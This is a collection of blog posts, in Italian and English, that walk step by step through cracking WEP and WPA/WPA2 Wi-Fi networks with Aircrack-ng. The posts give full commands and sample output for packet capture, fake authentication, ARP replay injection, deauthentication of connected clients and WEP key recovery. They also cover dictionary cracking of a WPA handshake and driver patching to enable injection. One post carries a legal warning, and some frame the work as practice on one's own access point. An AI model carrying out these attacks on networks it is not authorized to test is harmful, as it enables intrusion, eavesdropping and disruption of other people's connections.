Ora dovreste cercare una rete bersaglio. Dovrebbe avere connesso un client, poiché craccare le reti senza un client é un topic avanzato (Consultare Come craccare una rete wireless WEP senza client con Aircrack-ng). Dovrebbe utilizzare la cifratura WEP ed avere un’alta forza del segnale. Forse potreste riposizionare la vostra antenna per ottenere un segnale migliore. Spesso pochi centimetri fanno una grande differenza riguardo alla forza del segnale.

Nell’esempio sopra, la rete 00:01:02:03:04:05 rappresenterebbe l’unico bersaglio possibile, poiché é l’unica ad avere un client associato. Ma possiede anche un’alta forza del segnale, così é davvero un buon bersaglio per fare pratica.

Sniffing degli IV

A causa del salto di canale, non catturerete tutti I pacchetti dalla vostra rete bersaglio. Configureremo Aircrack_NG in modo che tracci l’attività di rete di un solo canale e scriveremo inoltre su disco tutti I dati per essere in grado di utilizzarli per il craccaggio:
_________________________________________________________
airodump-ng -c 11 – -bssid 00:01:02:03:04:05 -w dump rausb0
_________________________________________________________

Con il parametro -c vi sintonizzate su un canale, ed il parametro dopo -w é il prefisso dei pacchetti di rete scritti su disco. L’opzione “- -bssid” combinata con l’indirizzo MAC dell’AP limita la cattura ad un unico AP. L’opzione “- -bssid” é disponibile solamente sulle nuove versioni di airodump-ng.

Potete aggiungere inoltre il parametro “- -ivs”. Questo dice ad airodump-ng di catturare solo gli IV per risparmiare spazio.

Prima di poter craccare il WEP, di solito avrete bisogno di 250.000-500.000 Vettori d’Inizializzazione (IV) diversi. Ogni pacchetto di dati contiene un IV. Gli IV possono essere riutilizzati, così il numero di IV diversi é solitamente inferiore al numero di pacchetti di dati catturati.

Perciò avrete bisogno di aspettare di catturare da 250 a 500 mila pacchetti dati (IV). Se la rete non é occupata ciò richiederà parecchio tempo. Spesso potrete velocizzare di molto il processo utilizzando un attacco attivo (=replica di pacchetti). Consultate il capitolo successivo.

CRACCARE

Se avete abbastanza IV catturati in uno o più file, potete provare a craccare la chiave WEP:

___________________________________________
aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
___________________________________________

Il MAC dopo l’opzione -b é il BSSID dell’obiettivo e “dump-01.cap” il file che contiene i pacchetti catturati. Potete utilizzare più file, basta aggiungere tutti i loro nomi o utilizzare un carattere jolly come “dump*.cap”.

Per informazioni aggiuntive sui parametri di aircrack-ng, descrizione dell’output ed utilizzi, consultate il manuale.

Il numero di IV di cui avete bisogno per craccare una rete non é prefissato. Questo perché alcuni IV sono più deboli e dischiudono più informazioni sulla chiave rispetto agli altri. Solitamente questi deboli IV sono mischiati casualmente tra quelli più forti. Così, se siete fortunati, potete craccare una chiave con soli 100.000 IV. Ma spesso ciò non é abbastanza, ed aircrack-ng dovrà essere eseguito per molto tempo (fino ad una settimana od anche oltre con un alto fattore di fudge) e potrebbe inoltre dirvi che la chiave non possa essere craccata. Se avete più IV il craccaggio può essere svolto molto più velocemente, di solito in pochi minuti. L’esperienza indica che 250.000-500.000 IV sono di solito sufficienti per il craccaggio.

Ci sono alcuni sofisticati AP che utilizzano un algoritmo per escludere IV deboli. Il risultato é che non potrete ottenere più di “n” IV differenti dall’AP o che vi occorreranno milioni (tipo da 5 a 7) per craccare la chiave. Cercate nel Forum, ci sono alcuni thread su casi come questi e su come comportarsi.

ATTACCHI ATTIVI

Supporto all’iniezione

Molti dispositivi non supportano l’iniezione – almeno non senza driver patchati. Consultate la compatibility page, colonna aireplay. A volte questa tabella non è aggiornata, così se vedete un “NO” per il vostro driver non arrendetevi subito, ma consultate la homepage del driver, la mailing list del driver od il nostro Forum. Se riuscite a riprodurre un’iniezione con successo utilizzando un driver che non é elencato come supportato, non esitate ad aggiornare la tabella della compatibility page e ad aggiungere un link ad una breve guida.

Il primo passo consiste nell’assicurarsi che l’iniezione di pacchetti funzioni veramente con la vostra scheda ed I driver. Il modo piùfacile per testarlo é l’attacco di injection test. Assicuratevi di eseguire questo test prima di proseguire. La vostra scheda deve essere in grado di iniettare con successo prima di eseguire I passaggi successivi.

Vi occorre il BSSID (MAC dell’AP) e l’ESSID (nome della rete) di un AP che non opera il filtraggio dei MAC (es.il vostro) e dovete essere nel raggio dell’AP.

La prima cosa da fare é trovare il MAC del vostro stesso dispositivo di rete wireless. A volte c’é un’etichetta con il MAC sul dispositivo. Ma potete sempre trovarlo utilizzando il comando “ifconfig” (i 6 byte esadecimali dopo “HWaddr”, di norma divisi da “:” oppure”-”).

Quindi potete provare a connettervi al vostro AP utilizzando aireplay-ng:
_________________________________________________________________
aireplay-ng – -fakeauth 0 -e “il vostro ESSID di rete” -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 rausb0
_________________________

Il valore dopo -a é il BSSID del vostro AP, il valore dopo -h é il MAC del vostro stesso dispositivo di rete wireless.

Se l’iniezione funziona dovreste vedere qualcosa come questo:
__________________________________________
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful
__________________________________________

Altrimenti

1. ricontrollate l’ESSID, il BSSID ed il vostro stesso MAC
2. assicuratevi che il vostro AP abbia il filtraggio MAC disabilitato
3. testatelo contro un altro AP
4. assicuratevi che il vostro driver sia patchato e supportato
5. invece di “0″, provate “6000 -0 1 -q 10″

ARP REPLAY

Ora che sappiamo come funziona l’iniezione di pacchetti, possiamo fare qualcosa per velocizzare enormemente la cattura degli IV:–>ARP-request reinjection

L’Idea

ARP opera (per dirla in modo semplice) diffondendo una richiesta di un IP, ed il dispositivo che ha qull’IP risponde. Dato che il WEP non protegge contro la reiterazione, potete sniffare un pacchetto e inoltrarlo ancora ed ancora mantenendolo valido. Così dovete solo catturare e replicare una richiesta ARP indirizzata all’AP per creare molto traffico (e sniffare gli IV).

Il metodo pigro

Per prima cosa aprite una fiestra con uno sniffing di airodump-ng per il traffico (vedi sopra). aireplay-ng ed airodump-ng possono essere eseguiti assieme. Aspettate che un client appaia sulla rete bersaglio. Poi iniziate l’attacco:
____________________________________________________________________
aireplay-ng – -arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
____________________________________________________________________

-b specifica il BSSID dell’obiettivo, -h il MAC del client connesso.
Ora dovete aspettare che arrivi un pacchetto ARP. Di solito dovrete aspettare per alcuni minuti (o consultate il prossimo capitolo).
Se avete successo, vedrete qualcosa come questo:
__________________________________________________
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets…
__________________________________________________

Se dovete smettere di replicare pacchetti, non dovete aspettare che arrivi il pacchetto ARP successivo, ma potete riutilizzare il/i pacchetto/i successivo/i con l’opzione -r <nome del file>.

Quando utilizzate la tecnica d’iniezione ARP, potete utilizzare il metodo PTW per craccare la chiave WEP. Ciò riduce drasticamente il numero di pacchetti di dati ed il tempo di cui avete bisogno. Dovete catturare l’intero pacchetto in airodump-ng, il che significa che non dovete usare l’opzione “- -ivs” quando lo avviate. Per aircrack-ng, utilizzate “aircrack-ng -z <nome del file>”.

Se il numero di pacchetti di dati ricevuto da airodump-ng a volte smette di salire, forse dovreste ridurre il replay-rate. Potete farlo con l’opzione “-x <pacchetti al secondo>. Di solito inizio con 50 e li riduco finché I pacchetti non vengono nuovamente ricevuti con continuità . Un migliore posizionamento della vostra antenna di solito aiuta.

Il metodo aggressivo

Molti sistemi operativi cancellano la cache ARP al memento della disconnessione. Se vogliono inviare il pacchetto successivo dopo la riconnessione (o semplicemente usare il DHCP), devono inviare richieste ARP. Perciò l’idea é disconnettere un client e forzarlo a riconnettersi per catturare una richiesta [di] ARP. Un effetto collaterale é che potete sniffare anche l’ESSID durante la riconnessione. Ciò é utile quando l’ESSID del vostro bersaglio é nascosto.

Continuate ad eseguire I vostri airodumpng ed aireplay-ng. Aprite un’altra finestra e lanciate un attacco di deauthentication:
___________________________________________________________________
aireplay-ng – -deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 rausb0
___________________________________________________________________

-a é il BSSID dell’AP, -c il MAC del client bersaglio.

Aspettate alcuni secondi ed il vostro arp replay dovrebbe iniziare a girare.
Molti client provano a riconnettersi automaticamente. Ma il rischio che qualcuno riconosca quest’attacco (o che se non altro venga attirata l’attenzione su ciò che accade sulla WLAN) é più alto che con altri attacchi.

Per qualsiasi cosa, postate!!!

Guida all’installazione della nuova RC2 di Aircrack-ng

h3yboy — Sun, 10 May 2009 17:05:23 +0000

Prima di avventurarci nell’installazione della nuova rc di aircrack-ng analizziamo i tools della suite che sono stati aggiunti e/o migliorati e le principali novità di questo rilascio.
Tools:

Airdecloak-ng consente ora di rimuove dal file .cap il “wep cloaked frames” (introdotto ultimamente su alcuni Access Point per rafforzare il protocollo wep).
Tkip-tun-ng prima versione ancora purtroppo non definitiva, e quindi non completamente funzionanete, che mette in pratica la vulnerabilità scoperta qualche mese fa da Martin Beck ed Erik Tews sui protocolli WPA1/2-TKIP.
Aggiornamento anche di Airbase-ng, Airdriver-ng e Airodump-ng.

Principali novità introdotte:

Durante il crack della chiave sarà ora possibile utilizzare il codice sha-sse2. Ciò comporta naturalmente ad una notevole dei tempi di crack.
Possibilità di sfruttare al meglio le CPU dei processori Duo.
È ora possibile utilizzare un attaco a dizionario anche per chiavi wep.
Possibilità di salvare i file nel formato .csv utilizzato da kismet.

Possiamo ora procedere all’installazione eliminando prima di tutto la nostra vecchia versione di aircrack-ng mediante questi comandi:

sudo apt-get remove –purge aircrack-ng

Scarichiamo ed installiamo ora la rc2 svn di aircrack mediante ed eseguiamo da terminale i seguenti comandi per procedere con l’installazione:

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng/
make
sudo make install

Ubuntu8.10 : Aircrack-ng with RTL8187 (Alfa AWUS036H)

DeathOwl — Sat, 04 Apr 2009 01:30:01 +0000

I got some friends asking for help on Ubuntu8.10 for the USB wifi RTL8187 setup. I give it a try, and it works well for both monitoring & injection. So lets start from a scratch of clean install of Ubuntu8.10 distro & remind that this issue have been covered in various sites including the Ubuntu forum and the Aircrack community. My working environment is under VMware Workstation 6.5.2beta with NAT connection. There is no difference with command between HDD installation or Vmware.

First step, update your Ubuntu8.10?
After we complete install Ubuntu8.10 under VMware, we need to update all important requirement for the aircrack-ng program to work well under Ubuntu8.10. Naturally, there will be an auto notification tells that some update is required at the top right of Ubuntu8.10 desktop or you may just navigate to System > Administration > Update Manager for the updates. There were about at least 301 updates for the first time installation of Ubuntu8.10, but the most important updates are gcc, the kernel-headers, module-assistant package and the associates. These processes may take some time depending on your speed of internet connection.

Second step, installing aircrack-ng?
All updates above should be properly installed as it is considered to be automatic process. I prefer to install the firmware/driver before attaching the USB wifi device physically. Again, for the smoothness of our installation process, lets change user to root. It can be done by command sudo -i. Now, we are ready to install aircrack-ng suites into Ubuntu8.10. Navigate to System > Administration > Synaptic Package Manager. Click on Search icon, key in aircrack and start searching. Click the apply icon when ready to install.

Third step, removing the old drivers?
With the root access, root@ubuntu:~#, lets remove the old firmware/driver that comes along with the kernel installed previously.

root@ubuntu:~# cd /lib/modules/2.6.27-7-generic/kernel/drivers/net/wireless/
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/drivers/net/wireless/# rm rtl8187.ko
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/drivers/net/wireless/# cd
root@ubuntu:~#

Another place to remove the old driver,

root@ubuntu:~# cd /lib/modules/2.6.27-7-generic/kernel/net/ieee80211/
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/net/ieee80211# rm ieee80211_crypt_wep.ko
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/net/ieee80211# rm ieee80211_crypt.ko
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/net/ieee80211# rm ieee80211_crypt_ccmp.ko
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/net/ieee80211# rm ieee80211_crypt_tkip.ko
root@ubuntu:/lib/modules/2.6.27-7-generic/kernel/net/ieee80211# rm ieee80211.ko

Fourth step, installing the new driver for RTL8187?
Up until here, I haven’t attach the wireless card. Continue on our modification,

root@ubuntu:~# rmmod r8187 rtl8187 2>/dev/null
root@ubuntu:~# mkdir /usr/src/drivers
root@ubuntu:~# cd /usr/src/drivers
root@ubuntu:/usr/src/drivers# wget http://dl.aircrack-ng.org/drivers/rtl8187_linux_26.1010.zip
root@ubuntu:/usr/src/drivers# wget http://patches.aircrack-ng.org/rtl8187_2.6.27.patch
root@ubuntu:/usr/src/drivers# unzip rtl8187_linux_26.1010.zip
root@ubuntu:/usr/src/drivers# cp -v rtl8187_2.6.27.patch -t rtl8187_linux_26.1010.0622.2006
root@ubuntu:/usr/src/drivers# cd rtl8187_linux_26.1010.0622.2006/
root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# tar xzf drv.tar.gz
root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# tar xzf stack.tar.gz

After all adjustment above, we need to make some changes on r8187.h file. Lets hunt this file,

root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# cd beta-8187/
root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006/beta-8187# gedit r8187.h

So that, some changes need to be done in lines 46 & 47,
Ogirinal lines on 46 & 47 are :
#include <asm/io.h>
#include <asm/semaphore.h>

We overwrite lines 46,47 to this :
#if (LINUX_VERSION_CODE < KERNEL_VERSION(2,6,19))
#include <asm/io.h>
#include <asm/semaphore.h>
#else
#include <linux/io.h>
#include <linux/semaphore.h>
#endif

Original settings

Modified settings

Save it & we are ready to execute the compilation. Return to rtl8187_linux_26.1010.0622.2006 folder,

root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# apt-get install patch
root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# patch -Np1 -i rtl8187_2.6.27.patch
root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# make
root@ubuntu:/usr/src/drivers/rtl8187_linux_26.1010.0622.2006# make install

Everything should works well without error. Restart your distro and connect your card (eg : Alfa AWUS036H) or any card with RTL8187 based chipset.

Diagram above show an example of cracked wireless under 2minutes with Alfa AWUS036H. All the command to use aircrack-ng program is exactly the same except the device had to be changed to wlan0 or wlan1 depending on what you saw on terminal with ifconfig -a. You may refer HERE.

Do you have tutorial for RTL8187 in Ubuntu9.04 ?
Yes, you may refer inside my forum, HERE. Register to forum to view content.

Aircrack-ng: Exploiting Intialization Vectors

ericleite — Mon, 30 Mar 2009 02:56:12 +0000

Only recently have I begun to realize the truly insecure nature of modern day computer networking. Sadly, I’ve only been exposed to the tip of the iceberg. So what a better way to share my concern than to show everyone how easily a WEP wireless network can be tapped into by exploiting captured, weak initialization vectors. To do this, I am going to present instructions on how to use a well-known auditing and cracking tool named Aircrack-ng. The goal of this demonstration is to show how easy it is for a semi-savvy user to infiltrate a “secure”, WEP wireless network.

Before we continue, a special thanks to Dr. R. Vaughn for the inspiration to pursue the truth, and to T. Nguyen for his initial research and demonstration. Credit for this application belongs to developer Thomas d’Otreppe and a galactica of other programmers from around the world. Thanks.

Here’s a checklist of what you’ll need before you begin:

Linux platform (HD Install, Live CD, and USB mediums all work)
Aircrack-ng version 1.0-rc3 or later (download)
Compatible wireless card (more info)
A wireless router to serve as a target access point (AP)
LEGAL WARNING: Do not use this tool on an unauthorized network. Experts in the United States believe that sometimes, such use of an unsecured wireless network may be considered an “unauthorized access of a computer” which is prohibited under Federal law and even theft of communications. Legal causes of action which were cited include defrauding the Internet service provider and a breach of the Internet service agreement. (source)

There are seven primary steps to cracking a WEP encrypted wireless network. These steps serve as an overview of this tutorial:

Checking the status of your wireless device
Enabling “monitor mode” on your wireless device
Scanning local wireless access points and choosing the target
Filter the scan to display desired target only
Send Authentication Request and Associate with AP
Generate and capture sufficient traffic data
Crack captured Initialization Vectors (IVs) and decrypt WEP key

For clarification, you should know that the screenshots below were taken on a BackTrack3 linux sec distribution. I used a HD install setup and a wireless card manufactured by Edimax (model: ew-7318usg). I had to manually install RT73 (USB) drivers published by serialmonkey.

Step 1: Checking the status of your wireless device

We’ll begin by verifying that you have an installed wireless device:

Open up a shell console.
Type iwconfig to list all recognized wireless devices.
You may see several devices listed. Possible names are eth0, wlan0, rausb0, etc.
eth = ethernet, wlan = wireless interface, rausb = USB wireless interface
note: the numerical suffix in the device name represents a method of ordering the devices for the computer

Determine which wireless device you’ll be using and remember that device name for later.

Next, we’ll use the ifconfig command to record the mac address of your selected wireless device.

In the shell, type ifconfig <device name> to bring up the configuration for your selected device.
example: ifconfig rausb0

Image 1-0 // Using iwconfig and ifconfig to gather your device info

Note: Image 1-0 shows “no wireless extensions” next to lo, and eth0. That is because neither of these devices are wireless. lo = local loopback and eth0 = wired ethernet. I will be using “rausb0″ in my examples. You must replace “rausb0″ in the following commands with whatever your wireless device name is.

Step 2 – Enabling “monitor mode” on your wireless device

Using the Aircrack-ng utility package we installed, we will use the airmon-ng command to list the recognized devices, change our target device from Managed to Monitor mode, and than verify that our wireless devices has been properly modified by revisiting the iwconfig command.

In the shell console, type airmon-ng. A list of recognized wireless devices will appear.
Type airmon-ng start <device name> to set your wireless device to Monitor mode.
Note: replace <device name> with the wireless device you’ve chosen to use. In this case I used rausb0.
example: airmon-ng start rausb0
Finally, type iwconfig <device name> to verify that your device Mode is set to “Monitor”.
example: iwconfig rausb0

Image 1-1 // Setting mode to Monitor and confirming with iwconfig

Step 3 – Scanning local wireless APs and choosing the target

Now that your device is in monitor mode, we can scan for local wireless traffic and zero in on our target using the airodump-ng command.

In your shell console, type airodump-ng <device name> to begin gathering wireless traffiic data. Over time, you will begin to see wireless access points in your vicinity pop up (if any exist). It is even possible that airodump-ng will begin to gather data on clients that are connected to the wireless APs. You’ll see these stations listed in seperate section.
example: airodump-ng rausb0airodump-ng legend [Image 1-2]:
BSSID = the mac address of the AP
PWR = power of signal strength
Beacons = number of beacon packets sent out, these packets broadcast AP information
#Data = number of data packets being generated
#/s = number of data packets per second
CH = channel number of wireless signal
MB = # Mb/s type encryption
ENC = Encryption method
CIPHER = Cipher type
AUTH = Authentication type
ESSID = SSID name of wireless network

Image 1-2 // Using airodump-ng to capture wireless traffic

Step 4 – Filter the scan to display desired target only

After a few seconds, airodump-ng should have displayed the necessary information for your target wireless network. Record the following information for the target network for use later on: BSSID, Channel Number, and ESSID. Now we’re going to use airodump-ng to filter this list and hone in our our target AP.

Stop your current airodump-ng scan if you haven’t yet by hitting ctrl-c
Type airodump-ng -c <number> -w <filename> -b <bssid> <device name>
example: airodump-ng -c 10 -w dump -b 00:18:F8:72:7A:1E rausb0airodump-ng legend:
-c <number> = <number> represents the channel number for the target AP
-w <filename> = <filename> represents the filename that airodump-ng will create to store Initialization Vectors (IVs). Use something simple like “dump”.
-b <bssid> = <bssid> represents the mac address of the target AP
<device name> = <device name> represents whatever your wireless device name is. in our example we used rausb0.

Image 1-3 // Using airodump-ng to filter the scan onto primary target

Step 5 – Send Authentication Request and Associate with AP

Once you’re monitoring the target AP, you’ll need to send an authentication request in order to associate your machine with the AP. This command will allow us to inject data packets into the AP later on, and generate enough data in order to efficiently crack WEP and decrypt the key.

Let airodump-ng from step 4 continue to scan the target AP.
Open up a new shell console.
In the new shell, type:
aireplay-ng -1 0 –b <bssid> –h <device mac address> –e <essid name> <device name>
example: aireplay-ng -1 0 -b 00:18:F8:72:7A:1E -h 00:11:22:33:44:55 -e TOYSTORY rausb0aireplay-ng legend:
-1 0 = “-1 0″ corresponds to an attack by fake authentication, the zero is the delay that we authorize for the answer to come in.
-b <bssid> = <bssid> refers to the mac address of the target AP.
-h <deviec mac address> = use the mac address of your computer’s wireless device (refer to Image 1-0).
-e <essid name> = <essid name> refers to the string name of your target AP.
examples: linksys, NETGEAR, homerouter, c4ntcr4ckth1s
<device name> = <device name> represents whatever your wireless device name is. in our example we used rausb0.

Image 1-4 // Using aireplay-ng to send authentication request

Step 6 – Generate and capture sufficient traffic data

Now that we’ve sent our authentication request and associated successfully, we can begin our ARP-request injection. The key to this step is to force a rapid increase in the amount of data being transmitted at the AP. As you monitor the data column with airodump-ng, you’ll notice the data value rising slowly, depending on the amount of traffic that is being generated on that access point. There are several factors that determine this, one of them being whether there are any connected clients who are using the internet.

With ARP-request injection, aireplay-ng listens for an ARP packet, then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new Initialization Vector (IV). The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to decrypt the WEP key.

Using the same shell from Step 5, or via a new shell, type the command:
aireplay-ng -3 –b <bssid> –h <device mac address> <device name>
example: aireplay-ng -3 -b 00:18:F8:72:7A:1E -h 00:1F:1F:27:D2:63 rausb0aireplay-ng legend:
-3 = “3″ refers to the arpreplay module
-b <bssid> = <bssid> refers to the mac address of the target AP.
-h <device mac address> = use the mac address of your computer’s wireless device (refer to Image 1-0).
<device name> = <device name> represents whatever your wireless device name is. in our example we used rausb0.
[Image 1-5] You may need to wait a few seconds or minutes, but you should soon start to see a fast flood of ARP requests come across your screen.

Image 1-5 // Using aireplay-ng for arp request injection flooding

[Image 1-6] Glance over at the shell that is running airodump-ng (step 4) and you should start noticing the data for your target AP increase dramatically into the thousands.

Image 1-6 // Airodump-ng (step 4) showing rapid data traffic increase

At this point, thousands of IVs are being captured and deposited into the file you created in step 4 (if you used my example, the file will be named something like dump-01.cap). In order for the aircrack-ng utility to be succesful, you must capture at least 10,000 packets of data. The more data you capture, the greater your probability of being successful in decrypting the WEP key. I recommend letting the #Data reach nearer to 30,000 if you want a high success rate.
Hit ctrl-c to stop your ARP requests once you notice your #Data has reached a high enough value.

Step 7 – Crack Initialization Vectors (IVs) and decrypt WEP key

Now we’ll ask aircrack-ng to analyze our dump file and begin the process of decrypting the IVs for the WEP key.

Use the command aircrack-ng -b <bssid> <full filename> to begin cracking.
example: aircrack-ng -b 00:18:F8:72:7A:1E dump-01.capaircrack-ng legend:
-b <bssid> = <bssid> refers to the mac address of the target AP.
<full filename> = <full filename> refers to the complete filename of the file used to capture IVs. (in our example we created the file in the root directory, and using a simple ls command told us the filename was dump-01.cap)
note: when creating the dump file, “-01″ was automatically added in order to prevent file overwriting. this pattern continues with all consequent file creations receiving a unique suffix
(dump-01, dump-02, dump-03, dump-04, etc .)
If you captured enoughweak IVs, aircrack-ng crack successfully and you’ll be shown the hex value for the WEP key

Image 1-7 // Successful decryption and hex representation of WEP key

Now it’s as simple as entering the hex values into a wireless assistant manager in order to gain access to the WEP wireless network. Hardly comforting. Feel free to leave any questions, comments or concerns below and I’ll do my best to respond or help you resolve any issues.

pwning the pwnd

cx22 — Mon, 02 Feb 2009 15:45:59 +0000

I got some surprise growing when I first saw the neo-pwn edition.

I dont quite understand the freedom of the GPL. Or yes I do, but I dont like others taking too much profit out of community effort. I want to read the sources. And now it results that I have to buy their microsd card before they think if they can show me their wonderful kernel customizations.

Fortunately, we are reading here that since 2.6.28 version there is a good mac80211 stack included in the kernel, which makes the magic alfa 500 card work quite well, including monitor mode and injection rate, as long as wpa and wpa2 management with the same driver.

I’m trying aircrack patches with the 2.6.29 git openmoko – andy-tracking branch, and then we will see if we can build the rtl8187 module… that way we will have a pretty penetration-testing mobile platform… with all the debian goodies included

Keep reading…

ipw2200 (Intel PRO/Wireless 2200BG) packet injection

U-Black — Tue, 18 Nov 2008 15:26:00 +0000

Leggendo un pò di post qua e la nella rete, mi sono imbattuto spesso in dissertazioni varie sul pack

COMUNICAZIONE DI SERVIZIO - Server U-CLAN is OUT OF SERVICE

U-Black — Tue, 11 Nov 2008 13:05:00 +0000

Ragazzi…sono costretto a comunicarvi che il server dal quale vi davo la possibilità di scarica

Aircrack-NG e John The Ripper - Dizionario Password

U-Black — Mon, 10 Nov 2008 19:41:50 +0000

Visto che l’articolo su Aircrack-NG e il wpa cracking sono risultati molto popolari, mi sono p

BackTrack3 : Aircrack-ng with RT73 (WUSB54GC)

DeathOwl — Tue, 02 Sep 2008 11:05:11 +0000

Note : As mention before, BT3 failed to dual boot in F80S, all scenario here is applied in VMware Workstation in F80S. The main advantage of this solution is that you now can copy the VMware image to different notebooks or desktop computers running all kinds of operating systems and hardware configurations.

BT3 in VMware does not have internet connectivity, what should i do?
VMware itself have limitation on using internal/external devices such PCMCIA/PCI/PCI-Express but allow USB insertion. Therefore, get yourself a USB dongle that allow us to get connected to the net. We have a lot choices on USB dongle model that works on BT3, and I choose Alfa Network AWUS036H (RTL8187L) & Linksys WUSB54GC (RT73). In this post, I will show an example on how to use a Linksys WUSB54GC card with BT3.

How to connect Linksys WUSB54GC with my BT3 in VMware?
VMware will not automatically connect any external devices. To begin, load your BT3 completely, plug-in the Linksys WUSB54GC on the USB port. Now click on Vmware menu VM > Removable Devices > USB Devices > Linksys USB Device (Port 1). You are now ready to use the device and connected to the internet without installing any drivers for it. WUSB54GC card works out of the box in BT3.

How to make sure that the device is connected?
Open shell konsole in BT3, type ifconfig -a and you should see rausb0 for Linksys WUSB54GC [If you are using Alfa AWUS036H, you should see wlan0] ;

Is it possible to crack wireless connection with Linksys WUSB54GC and how to start?
Absolutely, to begin, we have to get some updates on the driver which is Ralink RT73 chipset for Linksys WUSB54GC and BT3 kernel. Open shell konsole, type
bt ~ # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # wget http://www.offensive-security.com/kernel.lzm, you should see this,

You may also get other drivers for different USB dongle model at http://homepages.tu-darmstadt.de/~p_larbig/wlan/

Note that the driver version is 3.0.1 and the format is *.bz2. We need to extract the file, on the same konsole, type
bt ~ # tar -xvjf rt73-k2wrlz-3.0.1.tar.bz2
bt ~ # ifconfig rausb0 down
bt ~ # lzm2dir kernel.lzm /

After that, we navigate to the extracted files, by typing
bt ~ # cd rt73-k2wrlz-3.0.1/Module
bt Module # make
bt Module # make install
bt Module # cd
bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up

Therefore, we are ready to crack some wireless line within certain distance. In this example, we are trying to crack WPA/WPA2 networks. Continue,
bt ~ # iwconfig rausb0 mode monitor rate 1M
bt ~ # iwconfig

Up until here, you will see rausb0 with bit rate=1Mb/s, cont.,
bt ~ # iwpriv forceprism 1
forceprism no private ioctls
bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0 rfmontx 1
bt ~ # airodump-ng rausb0

Then, CTRL+C to stop, now we have an AP has essid called home with the MAC address 00:1D:7E:64:88:B5 on channel 11, so on new konsole we type,
bt ~ # airodump-ng -c 11 -w /tmp/dmp rausb0

As for now, wait for 10seconds to make sure WPA Handshake appear on the top right side of the konsole. If it does not appear, follow step (1) cont. with step (2), if it does follow step (2) and ignore the step (1),
Step (1),
Open new shell konsole, type,
bt ~ # aireplay-ng 0 -5 -a 00:1D:7E:64:88:B5 rausb0
The 00:1D:7E:64:88:B5 is the AP MAC address. As you activate this command, notice the first konsole will have WPA handshake on top right.

Step (2),
Now we get our WPA handshake, press CTRL+C, as for WPA/WPA2 cracking, number of packets does not mean anything for the cracking purpose. Open new konsole,
bt ~ # aircrack-ng -w mangled.lst -b 00:1D:7E:64:88:B5 /tmp/dmp-01.cap
The mangled.lst is a dictionary file and it could be any name depending on your dictionary file, and the 00:1D:7E:64:88:B5 is the AP MAC address. You should see a calculating window once you execute this command such below image,

Are there any different between WPA and WPA2 cracking?
No. Same method of cracking is applied for both type of encryption.

Should I stop cracking calculation if the AP is off?
No, because we are cracking offline. You may continue until key is obtained.

Do you have video approach about cracking WEP/WPA?
Yep, you may download some of my vids HERE .